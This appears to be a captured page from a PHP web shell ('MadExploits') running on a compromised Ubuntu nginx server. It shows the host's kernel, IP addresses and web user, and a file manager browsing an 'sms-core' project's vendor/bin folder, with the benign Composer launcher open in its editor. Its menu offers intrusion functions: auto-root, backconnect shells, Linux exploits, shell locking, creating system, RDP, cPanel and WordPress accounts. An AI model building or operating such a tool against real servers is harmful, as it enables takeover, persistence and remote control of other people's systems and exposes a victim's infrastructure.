Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
carbon
391
B
-rwxrwxr-x
composer
2.18
KB
-rwxrwxr-x
doctrine-dbal
66
B
-rwxrwxr-x
generate-defuse-key
298
B
-rwxrwxr-x
jsonlint
2.94
KB
-rwxrwxr-x
openapi
5.96
KB
-rwxrwxr-x
patch-type-declarations
3.48
KB
-rwxrwxr-x
php-parse
6.1
KB
-rwxrwxr-x
phpunit
2.08
KB
-rwxrwxr-x
validate-json
6.66
KB
-rwxrwxr-x
var-dump-server
1.99
KB
-rwxrwxr-x
yaml-lint
1.12
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer
#!/usr/bin/env php <?php if (PHP_SAPI !== 'cli' && PHP_SAPI !== 'phpdbg') { echo 'Warning: Composer should be invoked via the CLI version of PHP, not the '.PHP_SAPI.' SAPI'.PHP_EOL; } setlocale(LC_ALL, 'C'); require __DIR__.'/../src/bootstrap.php'; use Composer\Console\Application; use Composer\XdebugHandler\XdebugHandler; use Composer\Util\Platform; use Composer\Util\ErrorHandler; error_reporting(-1); // Restart without Xdebug $xdebug = new XdebugHandler('Composer'); $xdebug->check(); unset($xdebug); if (defined('HHVM_VERSION') && version_compare(HHVM_VERSION, '4.0', '>=')) { echo 'HHVM 4.0 has dropped support for Composer, please use PHP instead. Aborting.'.PHP_EOL; exit(1); } if (!extension_loaded('iconv') && !extension_loaded('mbstring')) { echo 'The iconv OR mbstring extension is required and both are missing.' .PHP_EOL.'Install either of them or recompile php without --disable-iconv.' .PHP_EOL.'Aborting.'.PHP_EOL; exit(1); } if (function_exists('ini_set')) { @ini_set('display_errors', '1'); // Set user defined memory limit if ($memoryLimit = getenv('COMPOSER_MEMORY_LIMIT')) { @ini_set('memory_limit', $memoryLimit); } else { $memoryInBytes = function ($value) { $unit = strtolower(substr($value, -1, 1)); $value = (int) $value; switch($unit) { case 'g': $value *= 1024; // no break (cumulative multiplier) case 'm': $value *= 1024; // no break (cumulative multiplier) case 'k': $value *= 1024; } return $value; }; $memoryLimit = trim(ini_get('memory_limit')); // Increase memory_limit if it is lower than 1.5GB if ($memoryLimit != -1 && $memoryInBytes($memoryLimit) < 1024 * 1024 * 1536) { @ini_set('memory_limit', '1536M'); } unset($memoryInBytes); } unset($memoryLimit); } Platform::putEnv('COMPOSER_BINARY', realpath($_SERVER['argv'][0])); ErrorHandler::register(); // run the command application $application = new Application(); $application->run();
Close